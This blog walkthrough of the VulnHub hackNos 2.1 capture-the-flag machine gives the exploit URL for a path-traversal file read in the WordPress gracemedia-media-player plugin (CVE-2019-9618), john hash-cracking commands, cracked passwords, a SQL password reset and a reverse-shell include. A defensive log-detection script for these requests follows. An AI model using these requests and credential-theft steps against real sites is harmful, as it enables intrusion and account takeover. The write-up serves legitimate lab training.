**VulnHub-hackNos: Os-hackNos-2.1-Walkthrough**
Target machine address: https://www.vulnhub.com/entry/hacknos-os-hacknos,401/
Target machine difficulty: Easy + Intermediate (CTF)
Target machine release date: November 29, 2019
Target machine description:
Difficulty: Easy to Intermediate
Flag: 2 flags, first the user and second root
Learning: Web Application | Enumeration | Password Cracking
Changelog - 2019-12-13 ~ v1.1 - 2019-11-29 ~ v1.0
author: Dayu
time: 2020-02-09
Note: I downloaded all of these machines and run them in VMware. I will use Kali Linux as the attacker machine for this CTF. The techniques used here are for learning and educational purposes only; if they are used for any other goal, I will not be responsible.
First, information gathering
We need to determine the IP address of the target VM; use nmap to obtain the target IP address:
We've found the CTF target machine's IP address: 192.168.56.144
nmap finds ports 22 and 80 open ... the same as in 1 ...
Having already done 1 earlier ... go straight to brute-forcing ...
Found the tsweb directory ... looking further down shows that this is a WordPress CMS, so wpscan can be used ...
Run wpscan on it first ...
The familiar gracemedia-media-player plugin ... search Google for it ...
It can be exploited using the CVE-2019-9618 vulnerability ...
command: http://192.168.56.144/tsweb/wp-content/plugins/gracemedia-media-player/templates/files/ajax_controller.php?ajaxAction=getIds&cfg=../../../../../../../../../../etc/passwd
Found flag:$1$flag$vqjCxzjtRc7PofLYS2lWf/
This is a hash value ... crack it with john ...
command: john --wordlist=/usr/share/wordlists/rockyou.txt dayu
command: john --show dayu
Got a username and password: flag, topsecret
Second, privilege escalation
Method 1
Successful login ...
Note that this shell is restricted, so upgrade to a TTY ...
No permission to use this command ... only root can view it, skip ...
After looking around here for a long time, I found a pass file under backups ... it should be a password ... it turns out to be an MD5 value ...
$1$rohit$01Dl0NQKtgfeL08fGrggi0
Password cracked with john: !% hack41
Got the first flag ...
ALL ... privilege escalation ...
The earlier id output shows that sudo can be run ... escalate directly with sudo su to the root user, and view the second flag ...
Method 2
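Earlier, the password was obtained directly by viewing the pass file ... followed by privilege escalation with sudo ...
Here I'll use the database and see ... GO
The flag is obtained the same way as before ... continue on to escalating to root ...
Anyone who has been learning along with me knows that to look at the database you need to find the wp-config.php file ... it contains the database username and password ... find it!!
It is usually found under the html directory ... found it ...
Found the username and password: wpuser, hackNos-2.com
command: mysql -h localhost -uwpuser -phackNos-2.com
Found: $P$B.O0cLMNmn7EoX.JMHPnNIPuBYw6S2/
It can't be cracked, skip, skip ... I waited a long, long time, and in the end it still wasn't cracked ...
command: update wp_users set user_pass=md5("dayu") where user_login='user';
Here I use the command directly: although I can't crack the hash, I change the password of the user account to dayu
Successfully logged in with the username and password user/dayu ...
Once inside, it's a very familiar interface, which can be used directly ...
Copy dayushell in ... using readme.txt will do ...
Then use the earlier LFI vulnerability to include that txt file ... remember to start nc locally ...
command: 192.168.56.144/tsweb/wp-content/plugins/gracemedia-media-player/templates/files/ajax_controller.php?ajaxAction=getIds&cfg=../../../../../../../../../../var/www/html/tsweb/wp-content/themes/twentytwenty/readme.txt
It looks like only www-data privileges can be obtained this way ... continuing from here leads to root ... but this is just one approach, and there may be other methods ... if there are, please tell me, thanks!!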
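Seen from the defender's side, both requests to ajax_controller.php in this walkthrough (the /etc/passwd read and the readme.txt include) leave the same trace in the web server access log: a `cfg` parameter that climbs out of the plugin's directory. The following detection sketch is an added example, not part of the original post; it assumes the Apache/nginx combined log format, and the function names, the client address, the timestamps and the benign `cfg=default` value are constructed for illustration.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Script path taken from the requests shown in the walkthrough.
PLUGIN_SCRIPT = ("/wp-content/plugins/gracemedia-media-player"
                 "/templates/files/ajax_controller.php")
# Assumed "combined" access-log prefix: client, timestamp, request line, status.
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] '
                    r'"[A-Z]+ (?P<target>\S+) [^"]*" (?P<status>\d{3}) ')

def decode_fully(value, rounds=3):
    """Undo nested percent-encoding such as %252e%252e before matching."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def is_traversal(cfg):
    """True if cfg climbs out of the template directory or is an absolute path."""
    path = decode_fully(cfg).replace("\\", "/")
    return "../" in path or path.startswith("/") or "\x00" in path

def find_lfi_attempts(lines):
    """Return one dict per logged request whose cfg parameter is a traversal."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        url = urlsplit(m["target"]) if m else None
        if url is None or not decode_fully(url.path).endswith(PLUGIN_SCRIPT):
            continue
        for cfg in parse_qs(url.query).get("cfg", []):  # parse_qs decodes once
            if is_traversal(cfg):
                hits.append({"ip": m["ip"], "status": int(m["status"]),
                             "cfg": decode_fully(cfg)})
    return hits

# Constructed sample log lines (client address and timestamps are made up).
REQ = "/tsweb" + PLUGIN_SCRIPT + "?ajaxAction=getIds&cfg="
SAMPLE_LOG = [
    f'192.168.56.101 - - [09/Feb/2020:01:10:02 +0000] "GET {REQ}../../../../etc/passwd HTTP/1.1" 200 1742 "-" "curl"',
    f'192.168.56.101 - - [09/Feb/2020:01:40:15 +0000] "GET {REQ}%252e%252e%252f%252e%252e%252fthemes/readme.txt HTTP/1.1" 200 98 "-" "curl"',
    f'192.168.56.101 - - [09/Feb/2020:01:41:00 +0000] "GET {REQ}default HTTP/1.1" 200 12 "-" "Mozilla/5.0"',
    '192.168.56.101 - - [09/Feb/2020:01:42:00 +0000] "GET /tsweb/ HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
]
if __name__ == "__main__":
    for hit in find_lfi_attempts(SAMPLE_LOG):
        print(hit)
```

A 200 status on a flagged request suggests the file was actually served, so those entries deserve review first.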
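An early-morning article ...
Since we have successfully obtained root privileges and viewed the flag, this easy target machine is complete. I hope you liked this machine; please keep following Dayu, as there will be more challenging machines later on for us to practice and learn with together.
If you have other methods, feel free to leave a comment. If anything is written incorrectly, please be sure to tell me. If you think this blog post is well written, feel free to share it with the people around you.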